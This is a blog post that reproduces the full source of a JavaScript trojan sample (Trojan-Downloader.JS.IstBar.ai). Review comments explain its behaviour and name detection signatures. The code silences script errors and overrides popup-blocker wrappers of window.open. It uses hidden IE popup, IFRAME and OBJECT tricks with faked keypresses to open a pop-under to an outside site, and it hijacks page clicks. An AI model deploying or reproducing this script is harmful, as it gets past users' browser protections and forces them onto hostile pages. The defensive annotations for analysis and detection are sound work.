Trojan program TrojanDownloader.JS.IstBar.ai 病毒样本
//
detected: Trojan program Trojan-Downloader.JS.IstBar.ai URL: http://www.ffkan.com/js/newsp2.js
// Configuration for the popup/pop-under sample.
// paypopupURL is the page every code path below tries to open (an IoC taken
// from the listing itself).
// NOTE(review): the listing is whitespace-mangled; string literals in this
// reflowed copy are reassembled with the mangling whitespace removed.
var paypopupURL = "http://www.m117.cn/?f";
// Initial value only; version() overwrites usingActiveX from the user-agent
// before any popup path runs.
var usingActiveX = true;
// window.onerror handler. Returning true marks the error as handled, so the
// browser shows no script-error dialog for the many IE-only calls below that
// throw elsewhere. A global onerror that silently returns true is a common
// tell in this class of sample and worth flagging in review.
function blockError() {
  return true;
}
// Install the error-silencing handler before anything else runs.
window.onerror = blockError;
//
bypass norton internet security popup blocker
// Popup-blocker bypass: some blockers (Norton Internet Security per the
// author's comment above; the NS_ prefix presumably belongs to another
// product) replace window.open and keep the native function under these
// names. Restoring it makes every later window.open() call go to the real
// browser function. Probing for these two globals is a usable detection
// signature.
if (window.SymRealWinOpen) { window.open = SymRealWinOpen; }
if (window.NS_ActualOpen) { window.open = NS_ActualOpen; }
// Shared state for all popup paths. The typeof guards only default a value
// when no earlier script set it; note that usingActiveX was already declared
// above, so its guard here can never fire.
if (typeof (usingClick) == 'undefined') { var usingClick = false; }
if (typeof (usingActiveX) == 'undefined') { var usingActiveX = false; }
if (typeof (popwin) == 'undefined') { var popwin = null; }
if (typeof (poped) == 'undefined') { var poped = false; }   // true once any window.open() succeeded
var blk = 1;                      // master switch, AND-ed into usingClick/usingActiveX in version()
var setupClickSuccess = false;    // set once document.onclick has been hijacked by setupClick()
var googleInUse = false;          // set by detectGoogle(); selects which hidden OBJECT tryActiveX() reads
// NOTE(review): the mangled listing shows ' / ' here; a bare '/' is assumed.
var myurl = location.href + '/';
var MAX_TRIED = 20;               // retry budget shared by tryActiveX() and openActiveX()
var activeXTried = false;         // true once the ActiveX path has given up or succeeded
var tried = 0;
var randkey = '0';                // random key from server (NOTE(review): listing shows ' 0 '; '0' assumed)
var myWindow;                     // window obtained from the embedded OBJECT's parentWindow
var popWindow;                    // IE createPopup() window created in setupActiveX()
var setupActiveXSuccess = 0;      // 0..5 = attempt counter, 6 = setup completed
//
bypass IE functions
// IE-only preparation for the "ActiveX" popup path.
// Writes a hidden <INPUT> whose ONKEYPRESS handler is showActiveX(), then
// builds two containers for a 1x1 <OBJECT> that embeds an external page (the
// DATA URL below is an IoC from the listing): an IE createPopup() window and
// an off-screen <IFRAME>. tryActiveX() later reads the embedded object's
// parentWindow out of one of them and showActiveX() calls open() on that
// window — presumably so the popup is opened from a window context the page's
// popup blocker does not police. Everything here throws outside IE; the catch
// retries while the counter is below 5 (500 ms apart) and on the 5th failure
// falls back to the click-hijack path via setupClick().
// Detection notes: document.write of hidden INPUT/IFRAME/OBJECT elements,
// window.createPopup, and string-argument setTimeout are all visible
// signatures of this sample.
function setupActiveX() {
  if (usingActiveX) {
    try {
      if (setupActiveXSuccess < 5) {
        // Hidden text field; a synthetic keypress on it (see openActiveX) runs showActiveX().
        document.write('<DIV STYLE="display:none;"><INPUT ID="autoHit" TYPE="TEXT" ONKEYPRESS="showActiveX()"></DIV>');
        popWindow = window.createPopup();
        // Container 1: the createPopup() window, used when googleInUse is set.
        popWindow.document.body.innerHTML = '<DIV ID="objectRemover"><OBJECT ID="getParentDiv" STYLE="position:absolute;top:0px;left:0px;" WIDTH=1 HEIGHT=1 DATA="http://www.resume-cn.com/firefox.htm" TYPE="text/html"></OBJECT></DIV>'; // error page
        // Container 2: an off-screen iframe, used when googleInUse is not set.
        // (STYLE and src are reproduced as they appear in the listing.)
        document.write('<IFRAME NAME="popIframe" STYLE="position:absolute;top:-100px;left:0px;1px;height:1px;" src="/about:blank"></IFRAME>');
        popIframe.document.write('<OBJECT ID="getParentFrame" STYLE="position:absolute;top:0px;left:0px;" WIDTH=1 HEIGHT=1 DATA="http://www.resume-cn.com/firefox.htm" TYPE="text/html"></OBJECT>'); // error page
        setupActiveXSuccess = 6;   // sentinel checked by tryActiveX()
      }
    } catch (e) {
      if (setupActiveXSuccess < 5) {
        setupActiveXSuccess++;
        setTimeout('setupActiveX();', 500);   // string argument is evaluated like eval
      } else if (setupActiveXSuccess == 5) {
        activeXTried = true;
        setupClick();
      }
    }
  }
}
// Polls until the hidden OBJECT created by setupActiveX() exposes a
// parentWindow, stores it in myWindow and kicks off openActiveX().
// Which container is read depends on googleInUse (createPopup window vs.
// the off-screen iframe). While the object is not ready it re-arms itself
// every 200 ms; after MAX_TRIED polls it gives up and hands over to
// setupClick(). Note the timer is scheduled before the give-up check, so one
// more tick fires after the fallback; it is a no-op because activeXTried is
// then true. window.windowFired is set only after openActiveX() returns, so
// the first openActiveX() call always takes its retry branch.
function tryActiveX() {
  if (!activeXTried && !poped) {
    if (setupActiveXSuccess == 6 && googleInUse && popWindow && popWindow.document.getElementById('getParentDiv') && popWindow.document.getElementById('getParentDiv').object && popWindow.document.getElementById('getParentDiv').object.parentWindow) {
      myWindow = popWindow.document.getElementById('getParentDiv').object.parentWindow;
    } else if (setupActiveXSuccess == 6 && !googleInUse && popIframe && popIframe.getParentFrame && popIframe.getParentFrame.object && popIframe.getParentFrame.object.parentWindow) {
      myWindow = popIframe.getParentFrame.object.parentWindow;
      popIframe.location.replace('about:blank');   // drop the embedded page once its window is captured
    } else {
      setTimeout('tryActiveX()', 200);
      tried++;
      if (tried >= MAX_TRIED && !activeXTried) {
        activeXTried = true;
        setupClick();
      }
      return;
    }
    openActiveX();
    window.windowFired = true;
    self.focus();
  }
}
// Fires a synthetic onkeypress on the hidden #autoHit input, which runs its
// ONKEYPRESS handler showActiveX(); presumably the aim is for the resulting
// window.open() to look user-initiated to the popup blocker. Retries every
// 100 ms until myWindow and window.windowFired are both set, and after
// MAX_TRIED attempts falls back to setupClick().
// Note the second fireEvent argument: `(obj.keyCode = x)` evaluates to x, so
// what is passed is the assigned string, not the event object. With randkey
// '0', escape('0').substring(1) is the empty string.
function openActiveX() {
  if (!activeXTried && !poped) {
    if (myWindow && window.windowFired) {
      window.windowFired = false;
      document.getElementById('autoHit').fireEvent("onkeypress", (document.createEventObject().keyCode = escape(randkey).substring(1)));
    } else {
      setTimeout('openActiveX();', 100);   // string argument is evaluated like eval
    }
    tried++;
    if (tried >= MAX_TRIED) {
      activeXTried = true;
      setupClick();
    }
  }
}
// Keypress handler of the hidden #autoHit input: opens the popup from
// myWindow (the embedded object's parentWindow captured in tryActiveX())
// rather than from this page. On success the new window is immediately
// blurred and this page re-focused, i.e. a pop-under. On failure it switches
// to the googleInUse container once and restarts polling; a second failure
// ends the ActiveX path and installs the click hijack.
// newWindow is assigned without var and becomes an implicit global.
function showActiveX() {
  if (!activeXTried && !poped) {
    if (googleInUse) {
      // Detach the OBJECT from the createPopup() window before opening.
      window.daChildObject = popWindow.document.getElementById('objectRemover').children(0);
      window.daChildObject = popWindow.document.getElementById('objectRemover').removeChild(window.daChildObject);
    }
    newWindow = myWindow.open(paypopupURL, "abcdefg", "width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes");
    if (newWindow) {
      newWindow.blur();
      self.focus();
      activeXTried = true;
      poped = true;
    } else {
      if (!googleInUse) {
        googleInUse = true;
        tried = 0;
        tryActiveX();
      } else {
        activeXTried = true;
        setupClick();
      }
    }
  }
}
//
end bypass IE functions
//
normal call functions
// Plain window.open() path, used when neither the click nor the ActiveX
// path was selected by version(). If no window resulted (typically a popup
// blocker), it escalates to tryActiveX() or setupClick().
function paypopup() {
  if (!poped) {
    if (!usingClick && !usingActiveX) {
      popwin = window.open(paypopupURL, "abcdefg", "width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes");
      if (popwin) { poped = true; }
      self.focus();
    }
  }
  if (!poped) {
    if (usingActiveX) { tryActiveX(); } else { setupClick(); }
  }
}
//
end normal call functions
//
onclick call functions
// Last-resort path: hijacks document.onclick so the next click anywhere on
// the page opens the popup from inside a genuine user gesture (gopop), which
// blockers generally allow. The previous handler is saved in the implicit
// global prePaypopOnclick and chained by gopop(). Runs at most once.
// document.captureEvents is a legacy Netscape API.
function setupClick() {
  if (!poped && !setupClickSuccess) {
    if (window.Event) document.captureEvents(Event.CLICK);
    prePaypopOnclick = document.onclick;
    document.onclick = gopop;
    self.focus();
    setupClickSuccess = true;
  }
}
// Click handler installed by setupClick(): opens the popup once, re-focuses
// this page (pop-under), then invokes whatever onclick handler the page had
// before so the hijack is not noticeable.
function gopop() {
  if (!poped) {
    popwin = window.open(paypopupURL, "abcdefg", "width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes");
    if (popwin) { poped = true; }
    self.focus();
  }
  if (typeof (prePaypopOnclick) == "function") { prePaypopOnclick(); }
}
//
end onclick call functions
//
check version
// Probes for an ActiveX control by writing a hidden <OBJECT> with a fixed
// CLASSID; the name suggests it targets the Google Toolbar (which shipped its
// own popup blocker), but the listing does not say. The result feeds
// googleInUse, which selects the container tryActiveX() reads from.
// `|=` on a boolean coerces googleInUse to 0/1. NOTE(review): getElementById
// returns the element whether or not the control instantiated, so this test
// is presumably weaker than intended — confirm. Retries every 50 ms while
// document.write throws.
function detectGoogle() {
  if (usingActiveX) {
    try {
      document.write('<DIV STYLE="display:none;"><OBJECT ID="detectGoogle" CLASSID="clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB" STYLE="display:none;" CODEBASE="view-source:about:blank"></OBJECT></DIV>');
      googleInUse |= (typeof (document.getElementById('detectGoogle')) == 'object');
    } catch (e) {
      setTimeout('detectGoogle();', 50);   // string argument is evaluated like eval
    }
  }
}
// Selects the popup strategy from the user-agent string.
// usingClick: any of SV1 / Opera / Firefox present.
// usingActiveX: SV1 present, not Opera, and Microsoft or MSIE present — i.e.
// Internet Explorer carrying the SV1 token (added by IE6 on Windows XP SP2,
// the release that introduced IE's built-in popup blocker).
// os, bs and isframe are computed but never read, and
// `paypopupURL = paypopupURL` is a no-op; both look like leftovers.
// Ends by calling detectGoogle().
function version() {
  var os = 'W0';
  var bs = 'I0';
  var isframe = false;
  var browser = window.navigator.userAgent;
  if (browser.indexOf('Win') != -1) { os = 'W1'; }
  if (browser.indexOf("SV1") != -1) { bs = 'I2'; }
  else if (browser.indexOf("Opera") != -1) { bs = "I0"; }
  else if (browser.indexOf("Firefox") != -1) { bs = "I0"; }
  else if (browser.indexOf("Microsoft") != -1 || browser.indexOf("MSIE") != -1) { bs = 'I1'; }
  if (top.location != this.location) { isframe = true; }
  paypopupURL = paypopupURL;
  usingClick = blk && ((browser.indexOf("SV1") != -1) || (browser.indexOf("Opera") != -1) || (browser.indexOf("Firefox") != -1));
  usingActiveX = blk && (browser.indexOf("SV1") != -1) && !(browser.indexOf("Opera") != -1) && ((browser.indexOf("Microsoft") != -1) || (browser.indexOf("MSIE") != -1));
  detectGoogle();
}
version();   // runs at load: picks the strategy and writes the hidden probe OBJECT
//
end check version
// Dispatches to the strategy chosen by version(): plain open, ActiveX
// polling, or click hijack.
function loadingPop() {
  if (!usingClick && !usingActiveX) {
    paypopup();
  } else if (usingActiveX) {
    tryActiveX();
  } else {
    setupClick();
  }
}
//
\\\\\\\\\\\\\\
// Returns the value of cookie `name`, or null if absent (classic
// "name=value; name2=value2" scan: advance to the character after each
// space separator). Used by amt() for the once-per-session cap.
// NOTE(review): the separator literal is shown mangled in the listing; a
// single space " " is assumed, matching the usual form of this helper.
function GetCookie(name) {
  var arg = name + "=";
  var alen = arg.length;
  var clen = document.cookie.length;
  var i = 0;
  while (i < clen) {
    var j = i + alen;
    if (document.cookie.substring(i, j) == arg) return getCookieVal(j);
    i = document.cookie.indexOf(" ", i) + 1;
    if (i == 0) break;   // no further separator
  }
  return null;
}
// Writes cookie name=escape(value); optional positional extras are read from
// the deprecated SetCookie.arguments: [2] expires (Date), [3] path,
// [4] domain, [5] secure flag. An absent expires makes a session cookie.
function SetCookie(name, value) {
  var argv = SetCookie.arguments;
  var argc = SetCookie.arguments.length;
  var expires = (argc > 2) ? argv[2] : null;
  var path = (argc > 3) ? argv[3] : null;
  var domain = (argc > 4) ? argv[4] : null;
  var secure = (argc > 5) ? argv[5] : false;
  document.cookie = name + "=" + escape(value) + ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) + ((path == null) ? "" : ("; path=" + path)) + ((domain == null) ? "" : ("; domain=" + domain)) + ((secure == true) ? "; secure" : "");
}
// Expires cookie `name` by rewriting it with a timestamp in the past.
// Defined but only referenced from a commented-out line in amt().
function DeleteCookie(name) {
  var exp = new Date();
  exp.setTime(exp.getTime() - 1);
  // This cookie is history
  var cval = 0;
  document.cookie = name + "=" + cval + "; expires=" + exp.toGMTString();
}
// Cookie lifetime for the frequency cap; adjust as needed. (Translated from the listing.)
var expDays = 1;
var exp = new Date();
// 6 * 60 * 60 * 1000 ms is six hours, so one "day" unit here is 6 h, not 24 h.
exp.setTime(exp.getTime() + (expDays * 6 * 60 * 60 * 1000));
// Frequency cap using the 'countsports' cookie. First visit: writes '1' with
// no expiry (a session cookie) and returns 1, which is the only value that
// makes btpop() fire the popup. Later visits: increments the stored count
// and rewrites it with the `exp` expiry. The `count = 1` assignment is dead
// (count is not read afterwards), and parseInt has no radix.
// NOTE(review): the '1' literal is shown mangled in the listing; '1' assumed.
function amt() {
  var count = GetCookie('countsports');
  // show only once per IP (translated)
  // var count;   // show only N times per IP (translated)
  // alert(count);
  // count = null;
  if (count == null) {
    SetCookie('countsports', '1')
    return 1
  } else {
    var newcount = parseInt(count) + 1;
    if (newcount < 2) count = 1;
    SetCookie('countsports', newcount, exp);
    // DeleteCookie('countsports')
    return newcount
  }
}
// Returns the unescaped cookie value starting at `offset` and ending at the
// next ";" (or the end of document.cookie). Helper for GetCookie().
function getCookieVal(offset) {
  var endstr = document.cookie.indexOf(";", offset);
  if (endstr == -1) endstr = document.cookie.length;
  return unescape(document.cookie.substring(offset, endstr));
}
// Entry point: fires only when amt() reports the first visit of the session.
// aryADSeq is not defined in this listing; presumably the host page's ad
// queue, which would later evaluate the pushed string. When it is absent the
// push throws a ReferenceError and the catch calls openWindowBack() a
// second time.
function btpop() {
  if (amt() == 1) {
    openWindowBack();
    try {
      aryADSeq.push("openWindowBack()");
    } catch (e) {
      openWindowBack();
    }
  }
}
// Trims myurl to the part before the first '/' after position 8 (past the
// scheme, so presumably the page origin), then runs the ActiveX setup and
// the strategy dispatcher. Nothing else in this listing reads myurl.
// NOTE(review): the '/' literal is shown mangled in the listing; '/' assumed.
function openWindowBack() {
  myurl = myurl.substring(0, myurl.indexOf('/', 8));
  if (myurl == '') { myurl = '.'; }
  setupActiveX();
  loadingPop();
  // self.focus();
}
btpop()   // executes at load; no semicolon in the listing
有时间分析一下
QQ:273352165 evlon#126.com 转载请注明出处。
原文地址:https://www.cnblogs.com/evlon/p/810447.html